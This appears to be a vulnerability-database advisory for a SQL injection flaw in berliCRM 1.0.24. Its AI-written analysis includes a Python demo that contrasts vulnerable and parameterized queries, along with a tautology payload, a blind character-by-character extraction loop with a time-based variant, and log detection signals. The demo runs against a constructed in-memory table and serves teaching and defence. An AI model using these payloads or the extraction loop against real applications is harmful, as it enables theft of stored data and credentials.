VYPR
High severity · 8.2 · NVD Advisory · Published Jan 29, 2026 · Updated Apr 15, 2026

CVE-2020-37006

Description

berliCRM 1.0.24 contains a SQL injection vulnerability in the 'src_record' parameter that allows remote attackers to manipulate database queries. Attackers can inject malicious SQL code through a crafted POST request to the index.php endpoint to potentially extract or modify database information.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

berliCRM 1.0.24 has a SQL injection flaw in the src_record parameter that lets remote authenticated attackers extract or modify database information.

Vulnerability Analysis

berliCRM version 1.0.24 is vulnerable to SQL injection through the src_record parameter of POST requests to index.php. The application incorporates the parameter into SQL query text without binding it as a parameter or validating it against the expected record-identifier format, so an attacker who controls the value controls part of the query and can alter the underlying database operations [2][3].

Exploitation Conditions

An attacker must hold a valid session cookie to reach the vulnerable endpoint. The exploit is a crafted POST request whose src_record value carries the injected SQL; the public proof of concept uses time-based blind injection, wrapping a condition around sleep() so that the response delay reveals whether the condition held and data can be recovered one character at a time [2]. No special network position is required beyond HTTP(S) reachability of the application.

Impact

Successful exploitation allows an attacker to read sensitive data from the database, modify existing records, or, depending on the database account's privileges, drop tables, compromising the confidentiality and integrity of the CRM's data. The CVSS v3 base score of 8.2 reflects the high confidentiality impact and low attack complexity [3]. One check worth making: with network access, low complexity and no user interaction, 8.2 is the score of a no-privileges-required vector such as AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N, so the authenticated-session requirement noted above should be compared against the vector published by NVD before the score is used to prioritise.

Mitigation

As of the publication date, no patched release for berliCRM 1.0.24 has been identified (see Patches below). Until one is available, treat src_record as untrusted on every code path that reaches the database: use parameterized (prepared) statements instead of string concatenation, validate the value against the expected record-identifier format before it is used, and run the application with a database account that cannot drop or alter tables. Because the exploit is publicly available, the risk of active exploitation is elevated [2]; requests to index.php whose src_record value contains quote characters, SQL comment sequences or functions such as sleep() or benchmark() are a reasonable detection signal in web server and WAF logs.
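The following Python script is an added illustration for the Exploitation Conditions and Mitigation sections above; it is not berliCRM code and does not reproduce the published proof of concept. It builds a constructed in-memory SQLite table with a src_record column (the table name, columns and sample rows are invented for the demo), shows the vulnerable string-concatenation pattern beside the parameterized and format-validated replacement, and runs a blind extraction loop against the vulnerable path. SQLite has no sleep(), so the oracle here is whether a row comes back; the MySQL time-based variant mentioned in the comments swaps that oracle for a response delay and keeps the same search loop.

```python
import re
import sqlite3
import string


# Constructed stand-in for a CRM table. This is NOT berliCRM's schema or code;
# it only reproduces the flaw class: an untrusted 'src_record' value spliced into SQL.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE crm_records (id INTEGER PRIMARY KEY, src_record TEXT, "
        "owner TEXT, api_token TEXT)"
    )
    db.executemany(
        "INSERT INTO crm_records (src_record, owner, api_token) VALUES (?, ?, ?)",
        [("LEAD-1001", "alice", "tok-7f3a9c"), ("LEAD-1002", "bob", "tok-b61e02")],
    )
    return db


def lookup_vulnerable(db, src_record):
    """Vulnerable pattern: the parameter becomes part of the query text."""
    sql = "SELECT owner FROM crm_records WHERE src_record = '" + src_record + "'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


# Assumed identifier format for the constructed data above. berliCRM's real
# src_record format is not given on the page and must be taken from the application.
SRC_RECORD_RE = re.compile(r"[A-Z]+-[0-9]+")


def is_valid_src_record(value):
    """Allow-list check: reject anything that is not a plausible record identifier."""
    return SRC_RECORD_RE.fullmatch(value) is not None


def lookup_safe(db, src_record):
    """Hardened pattern: validate the format, then bind the value as a parameter.

    With binding the database never parses the value as SQL; the format check is
    defence in depth and also keeps garbage out of logs and error paths.
    """
    if not is_valid_src_record(src_record):
        return None
    sql = "SELECT owner FROM crm_records WHERE src_record = ?"
    row = db.execute(sql, (src_record,)).fetchone()
    return row[0] if row else None


ALPHABET = string.ascii_lowercase + string.digits + "-"


def extract_blind(db, target_subquery, max_len=32):
    """Recover the result of target_subquery one character at a time.

    Oracle: lookup_vulnerable() returns a row only when the injected condition is
    true. Against MySQL the same condition is typically wrapped as
    IF(<cond>, SLEEP(3), 0) and a slow response is the 'true' signal; the
    character search below is unchanged.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            # The trailing '--' comments out the closing quote the application appends.
            payload = f"LEAD-1001' AND substr(({target_subquery}),{pos},1)='{ch}'--"
            if lookup_vulnerable(db, payload) is not None:
                recovered += ch
                break
        else:
            break  # no candidate matched: end of the target string
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tautology input:", lookup_vulnerable(db, "x' OR '1'='1"))
    print("safe, same input:           ", lookup_safe(db, "x' OR '1'='1"))
    print("blind extraction:           ",
          extract_blind(db, "SELECT api_token FROM crm_records WHERE owner='alice'"))
```

The extraction loop needs one request per candidate character per position, which is why a public time-based proof of concept is still a practical data-theft tool: against a real deployment an attacker simply trades requests for bytes, and the number of requests is the only cost. The hardened lookup returns nothing for the tautology payload because the bound value "x' OR '1'='1" is compared literally against src_record and, before that, fails the format check.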

AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 1

Patches: 0 (no patches discovered yet)

Vulnerability mechanics: AI mechanics synthesis has not run for this CVE yet.

References: 3

News mentions: 0 (no linked articles in our index yet)